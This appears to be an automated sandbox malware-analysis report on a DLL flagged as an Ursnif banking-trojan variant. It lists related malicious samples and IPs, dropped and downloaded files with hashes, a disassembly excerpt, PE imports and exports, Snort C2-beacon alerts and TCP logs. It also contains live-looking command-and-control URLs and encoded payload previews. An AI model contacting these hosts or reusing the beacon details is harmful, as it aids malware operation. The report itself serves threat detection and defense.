	SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll	Get hash	malicious	Browse	165.232.183.49
	documentation_39236.xlsb	Get hash	malicious	Browse	165.232.183.49
	3a94.dll	Get hash	malicious	Browse	165.232.183.49
	3b17.dll	Get hash	malicious	Browse	165.232.183.49
	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ITOS-ASRU	1n0JwffkPt.exe	Get hash	malicious	Browse	185.228.233.5
	niaSOf2RtX.exe	Get hash	malicious	Browse	193.187.173.42
	ao9sQznMcA.exe	Get hash	malicious	Browse	193.187.175.114
	k87DGeHNZD.exe	Get hash	malicious	Browse	193.187.175.114
	iiLllZALpo.exe	Get hash	malicious	Browse	193.187.175.114
	E6o11ym5Sz.exe	Get hash	malicious	Browse	193.187.175.114
	Oo0Djz1juc.exe	Get hash	malicious	Browse	193.187.175.114
	JeqzgYmPWu.exe	Get hash	malicious	Browse	193.187.175.114
	HBkYcWWHmy.exe	Get hash	malicious	Browse	185.159.129.78
	report.11.20.doc	Get hash	malicious	Browse	193.187.175.31
	intelligence_11.20.doc	Get hash	malicious	Browse	193.187.175.31
	details-11.20.doc	Get hash	malicious	Browse	193.187.175.31
	deed contract_11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	figures_010.14.2020.doc	Get hash	malicious	Browse	193.187.173.48

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9D47ABEC-EF99-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	49752
Entropy (8bit):	1.9569503448438568
Encrypted:	false
SSDEEP:	192:r5ZeZr2lWutbificuzMn2b6Z6Bodpt9yasGFV9VtwBaM9Q99s55S9Q9pWS9c9uLk:rvKicO8D4E2eo9g
MD5:	D9D86C47D26D156B082F4BEA659FB4FC
SHA1:	F8F2D0E435E1D6F5C7C160176B306A536794B8C1
SHA-256:	B07EA6732E8BD1AFBFF7DC617880EB9916985849CFD0EC9E3E5B63C809B2B2F0
SHA-512:	AE3B84C757C04840A9DA9AAE1106B477C9F245E5E5F1A6D1AF98FB052BFBD757FBD7AFDE2A4DB941991E3AC7FBC1C0EA6444BC7C8CBC73485B9185D5FFF6C189
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9D47ABEE-EF99-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5962339762347226
Encrypted:	false
SSDEEP:	48:IwkGcprxGwpa1G4pQdGrapbSxGQpBV8GHHpc7TGUpQOBGcpm:r4ZrQn69BSLjR2V6Yg
MD5:	4F7307F79A7D02B37456508FA792BCC1
SHA1:	C3A8746F3E5C74C147D5106D990DA3B420A84055
SHA-256:	5452BB2C125739B50D9C873AEF701C76D715588E60A03EF5FD6D42BB17FD3E57
SHA-512:	2043C7F4BE42DC8982A5E840F6C273D22903261AD54CCC1A53259B05C600D8428F5228F24118603914492E289F350894621829E840A785E3D307E365FDA8736C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A6C9EAC6-EF99-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5991563191902864
Encrypted:	false
SSDEEP:	48:IwYGcprNGwpaRG4pQMGrapbS9GQpBY7GHHpczTGUpQ54MGcpm:rsZXQD6KBSHjF2N66Ig
MD5:	B454F8BD4D78BAC1F27B11D89606531C
SHA1:	1A2DC52E748FC87214E10038160CC91946528B92
SHA-256:	0213C79370DF0B8A0C52AC605E17E5B8FA32E445CC13A572A2F6EF99B8655B9A
SHA-512:	50BAD493E209B593DD79C9AED555D52CBFA52C4E18E8B8DA002FD02303997615F8732FEB81C2E6330E26B9EB384F69830D062FEE29D2F75E8CCB3319C2B33C3B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\610143e0e072b[1].bin Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	258248
Entropy (8bit):	5.999883540264496
Encrypted:	false
SSDEEP:	6144:Qi8AzDRGYmrSXDWNWjqy+g5PCb5ukATGo5G3dNlC0b+391z:Q7AzDrTfc8ywGpNzC0CN1z
MD5:	E2AA0BABB9A68C7C045922635B47BFBE
SHA1:	4EDFE8A6E9A60B77142A7CB52540D4A182758048
SHA-256:	30C03B1CA6E1C248EFC4B91A7672B572CBF5A0DBFB09AA7D1935E841BC6D0A3D
SHA-512:	9D587CC7F4D077F955F75535D297FFD58D63DE51D6E46A597A5493FFCB0A6401ED98B9E2F66016D66EC496E92DA6E67A5F5D58C4B563D9AADC85A57758DC6267
Malicious:	false
IE Cache URL:	http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M
Preview:	bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuuPxkUGJLnhF6WtxHaP54R5UpcHhX1bxT/Ygk+4MGnHGr0roj/d9cPXN2oSESMAVAXEg8or5wPYWqWtD3F3t8A0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\610143ef37a40[1].bin Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	258248
Entropy (8bit):	5.999883540264496
Encrypted:	false
SSDEEP:	6144:Qi8AzDRGYmrSXDWNWjqy+g5PCb5ukATGo5G3dNlC0b+391z:Q7AzDrTfc8ywGpNzC0CN1z
MD5:	E2AA0BABB9A68C7C045922635B47BFBE
SHA1:	4EDFE8A6E9A60B77142A7CB52540D4A182758048
SHA-256:	30C03B1CA6E1C248EFC4B91A7672B572CBF5A0DBFB09AA7D1935E841BC6D0A3D
SHA-512:	9D587CC7F4D077F955F75535D297FFD58D63DE51D6E46A597A5493FFCB0A6401ED98B9E2F66016D66EC496E92DA6E67A5F5D58C4B563D9AADC85A57758DC6267
Malicious:	false
IE Cache URL:	http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z
Preview:	bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuuPxkUGJLnhF6WtxHaP54R5UpcHhX1bxT/Ygk+4MGnHGr0roj/d9cPXN2oSESMAVAXEg8or5wPYWqWtD3F3t8A0

C:\Users\user\AppData\Local\Temp\~DF6E67667E2D178577.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13093
Entropy (8bit):	0.5104081457798227
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loHL9loHL9lWHelYUbGku:kBqoIHsHyHelxPu
MD5:	368B4DE14F0F7C669C1EABB8C67C393F
SHA1:	B51F2803B8E55F38AF75FE9D7178023BEE7E7D38
SHA-256:	6B5210DBCA6A7EAFC783EBC3A7C84D87FE7EFEA2A6656BD9A3A980B6B39115DC
SHA-512:	14995990C875F1247DE4DDEF79462B6ABF92523AD6640464479E6939A13C79ECC077BB2B51C4C5BED98B59D311B1409C2AC210CE5880611A8EA2FC2DEB0CB5DD
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF8C183346DBFD51CA.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.32989653659918533
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwsF9lwVi9l2S/9l2a9w:kBqoxKAuvScS+sWV7S+vOy
MD5:	9692D46F5758C87BB0A508379F8726FE
SHA1:	17DD49A77FA3CA1B8381A7DA8FDF38B3C4CB95FE
SHA-256:	4AD272D238CE09D5E8AFC346A99226EC1E38F620F8BD0D1D4058BB830A3DF2A1
SHA-512:	0FECDFBB9F36F0C0B72D7D50EFF17E9754E3E607A4D4508CB2906C4AF2B136218637F1C65740B247E54199E61693CD67267CF57AA527C18E9B45C6FE1086C877
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC2C22C1E682D9D5C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.32981899390155306
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw8+F9lw8ni9l28c/9lq:kBqoxKAuvScS+FWY75+Y5y
MD5:	47930CE58666CEF0721DE299164C740A
SHA1:	E0BC075290670906E92F2B2BCF4E19832DF54CF4
SHA-256:	8577A62E150E46E0C345DC98A380D5C50907382B8C4F1F2DF2787A7AB422CAEA
SHA-512:	B4C245D5338D601C3EA5DA272DE0E3538716B8315A8A1B76DEAE3B901DA2F61F7E40DF13E1FB46D047114F9BE3B14E9EA06E2375E5981212413E1117EAA9BE0C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.669337136859866
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mental.dll
File size:	363520
MD5:	244fcb71c16ab8163f25c633dcb91b1c
SHA1:	cf0256c44be6b311558358bb00f9ec257ec90236
SHA256:	48589e8612584c5b67c325367e53b63379dbf984a0a0dc905bd29fd3f7fd6c03
SHA512:	8768bcda747665ef22c4ca8208c43ade6397f7792a6b32a8ce37f7630513a684b7c3ab69620d5a74350f00e74ba72393f6ba08cec988172d5e0552161814d5cb
SSDEEP:	6144:BstpyZ+ANKFOVwmBfjdLz5kazt+x1gLY3TGAa7VGpwCu:BstpbAmOOmljdLGeZOGH7Cu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gDL..........T......T......T..;...~.......+.....~......~......~.....Rich...........PE..L....T.U...........!.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10084d4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x55AD541F [Mon Jul 20 20:03:43 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	81dcae87737005169c62f2a77494413a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F54ECD41677h
call 00007F54ECD49C19h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F54ECD4167Ch
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 010550F0h
call 00007F54ECD488F2h
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F54ECD4167Eh
cmp dword ptr [01058DC8h], esi
je 00007F54ECD4175Ah
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F54ECD41677h
cmp esi, 02h
jne 00007F54ECD416A7h
mov ecx, dword ptr [0102F3C4h]
test ecx, ecx
je 00007F54ECD4167Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F54ECD41727h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F54ECD41486h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F54ECD41710h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F54ECD5641Ch
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F54ECD4169Ah
test edi, edi
jne 00007F54ECD41696h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F54ECD56404h
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F54ECD4144Ch
mov eax, dword ptr [0102F3C4h]
test eax, eax
je 00007F54ECD41679h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Rich Headers

Programming Language:

[EXP] VS2013 UPD3 build 30723
[LNK] VS2013 UPD3 build 30723
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x55840	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x558b0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf1000	0x2330	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2e220	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x53e00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c29b	0x2c400	False	0.624470338983	data	6.70528406671	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2e000	0x28268	0x28400	False	0.642626649845	data	5.96206029099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x57000	0x999ec	0x1c00	False	0.317103794643	DOS executable (block device driver ght (c)	3.92757280151	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xf1000	0x2330	0x2400	False	0.751193576389	data	6.59555210394	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesA, CreateProcessA, GetEnvironmentVariableA, RemoveDirectoryA, GetDiskFreeSpaceA, GetModuleFileNameA, VirtualProtect, GetCurrentDirectoryA, GetCurrentThreadId, GetTempPathA, CreateFileW, ReadConsoleW, WriteConsoleW, SetStdHandle, OutputDebugStringW, LoadLibraryExW, HeapReAlloc, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetFileType, HeapSize, GetModuleFileNameW, WriteFile, GetStdHandle, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetLastError, HeapFree, HeapAlloc, GetCommandLineA, GetCPInfo, RaiseException, RtlUnwind, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, GetProcAddress, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, IsDebuggerPresent, GetProcessHeap, ExitProcess, GetModuleHandleExW
USER32.dll	GetMessagePos, CheckMenuItem, FindWindowA, UpdateWindow, LoadImageA, DispatchMessageA, ShowWindow, EnumChildWindows, CheckMenuRadioItem, GetAsyncKeyState, GetWindowTextW, GetDC, DrawIcon, IsWindowEnabled, GetClassNameA
ole32.dll	OleUninitialize, OleInitialize, OleSetContainedObject, CLSIDFromString, CoUninitialize, CoInitialize, CoCreateInstance
dhcpcsvc.DLL	DhcpRequestParams, DhcpCApiInitialize, DhcpRegisterParamChange, DhcpCApiCleanup, DhcpUndoRequestParams, DhcpRemoveDNSRegistrations

Exports

Name	Ordinal	Address
Behind	1	0x101d210
Factpresent	2	0x101daf0
Steadunder	3	0x101d0c0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/28/21-13:47:44.437295	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49741	80	192.168.2.4	185.228.233.17
07/28/21-13:47:44.437295	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49741	80	192.168.2.4	185.228.233.17
07/28/21-13:47:58.751058	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49746	80	192.168.2.4	185.228.233.17

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2021 13:47:44.356667995 CEST	49740	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.356739044 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.435774088 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.435945988 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.437294960 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.437637091 CEST	80	49740	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.437787056 CEST	49740	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.559895992 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984083891 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984112024 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984186888 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.984201908 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.984920979 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.984992027 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.986373901 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.986587048 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.987365961 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.987401009 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.987436056 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.987457991 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.989960909 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.989990950 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.990114927 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:44.992269993 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.992300987 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:44.992418051 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.064274073 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064304113 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064321041 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064336061 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064357996 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064376116 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.064409018 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.064451933 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.067833900 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.067868948 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.067910910 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.067996979 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.068030119 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.068057060 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.068119049 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.068129063 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.069256067 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071062088 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071108103 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071186066 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071193933 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071219921 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071239948 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.071278095 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.071312904 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.073014975 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073043108 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073103905 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.073127985 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073177099 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.073199987 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.073241949 CEST	49741	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:45.144730091 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144759893 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144773006 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144783974 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144800901 CEST	80	49741	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:45.144820929 CEST	80	49741	185.228.233.17	192.168.2.4
